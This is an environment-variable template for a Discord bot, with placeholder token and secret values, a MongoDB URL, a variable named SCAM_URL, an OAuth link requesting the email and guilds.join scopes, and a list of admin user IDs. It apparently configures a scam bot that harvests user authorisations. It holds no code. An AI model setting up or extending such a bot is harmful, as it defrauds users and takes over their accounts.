# BOT INFOS
TOKEN=BOT_TOKEN
SECRET_CLIENT=BOT_SECRET_CLIENT
ID=BOT_ID

# URL(s)
MONGO_URL=mongodb://USERNAME:PASSWORD@ADRESS/?authMechanism=DEFAULT&authSource=admin&dbName=DB_NAME
SCAM_URL=http://scam.exemple.com
REDIRECT_URL=https://google.com
BOT_URL=https://discord.com/oauth2/authorize?client_id=BOT_ID&response_type=code&scope=email+guilds.join+identify

# ADMINS ID(s)
IDS=165038038509027329,303857719054696448,217334897163894785

# CONFIG
COLOR='#fd63ff'
PORT=80
